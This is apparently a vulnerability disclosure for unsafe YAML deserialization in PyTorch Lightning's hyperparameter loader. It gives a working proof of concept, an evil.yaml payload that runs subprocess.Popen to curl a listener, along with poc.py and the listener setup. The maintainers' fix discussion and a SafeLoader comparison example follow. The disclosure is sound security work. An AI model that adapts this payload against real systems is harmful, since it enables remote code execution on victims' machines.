Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning

Valid

Reported on

Dec 12th 2021


Description

There is an untrusted YAML deserialization vulnerability in the PyTorchLightning GitHub repository. PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) calls "yaml.UnsafeLoader" from the pyyaml Python library, which is not a secure method. Because of that, a maliciously crafted YAML config file can cause code execution on the victim's machine.

Proof of Concept

  • Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
  • Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
  • After that, you need to start an HTTP server on port 8080 of your attacker machine. When you run the command below, you will see the HTTP request from the victim host because of the malicious YAML file.
python3 -m http.server 8080
  • Run the poc.py file; after that you will see the HTTP request coming from the victim host:
python3 poc.py

Impact

A maliciously crafted YAML config file can cause code execution on the victim's machine.

We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
Carlos Mocholí validated this vulnerability a month ago
oivrip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí
a month ago

Maintainer


As mentioned in the reference link, is the fix just updating https://github.com/PyTorchLightning/pytorch-lightning/blob/7aee00c679d64ed62c0e119415ac3e02a0e434fb/requirements.txt#L7 to >=5.3.1?

oivrip
a month ago

Researcher


Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoader may also open the door to different deserialization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.

oivrip
a month ago

Researcher


Another reference about this subject: https://blog.ankursundara.com/pyyaml-cve/

Carlos Mocholí
a month ago

Maintainer


Okay, thank you! Do you want to open a PR so you get the fix bounty?

oivrip
a month ago

Researcher


Thank you for your offer! You can open a PR.

Carlos Mocholí confirmed that a fix has been merged on 62f1e8 a month ago
The fix bounty has been dropped
saving.py#L347 has been validated
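
The loader difference described in the report, and the SafeLoader recommendation from the comments, as an added example that is not part of the original report or the project's code. It assumes PyYAML is installed; `load_hparams_unsafe`, `load_hparams_safe`, `write_sample` and the sample YAML strings are hypothetical names and constructed inputs, and the tagged sample only calls the harmless `os.getcwd`.

```python
# Added example: assumes PyYAML is installed (pip install pyyaml).
import os
import tempfile

import yaml

# Constructed sample inputs. The tagged one names a harmless function
# (os.getcwd) so the difference between loaders can be observed safely.
PLAIN_HPARAMS = "learning_rate: 0.001\nbatch_size: 32\nlayers: [64, 64]\n"
TAGGED_HPARAMS = "learning_rate: !!python/object/apply:os.getcwd []\n"


def load_hparams_unsafe(path):
    """Mirrors the reported pattern: UnsafeLoader honours python/* tags."""
    with open(path) as fp:
        return yaml.load(fp, Loader=yaml.UnsafeLoader)


def load_hparams_safe(path):
    """Hypothetical hardened loader: plain YAML types only."""
    with open(path) as fp:
        try:
            hparams = yaml.safe_load(fp)  # SafeLoader has no python/* constructors
        except yaml.YAMLError as exc:
            raise ValueError(f"refusing hparams file {path}: {exc}") from exc
    if hparams is None:  # empty file
        return {}
    if not isinstance(hparams, dict):
        raise ValueError(f"{path}: top level must be a mapping")
    return hparams


def write_sample(text):
    """Write constructed YAML to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".yaml")
    with os.fdopen(fd, "w") as fp:
        fp.write(text)
    return path


if __name__ == "__main__":
    plain, tagged = write_sample(PLAIN_HPARAMS), write_sample(TAGGED_HPARAMS)
    print(load_hparams_safe(plain))     # ordinary hyperparameters still load
    print(load_hparams_unsafe(tagged))  # the loader itself called os.getcwd()
    try:
        load_hparams_safe(tagged)
    except ValueError as exc:
        print("rejected:", exc)
    for path in (plain, tagged):
        os.remove(path)
```

With the safe loader, a file containing any `python/*` tag fails at parse time with a constructor error, while files holding only scalars, lists and mappings load unchanged.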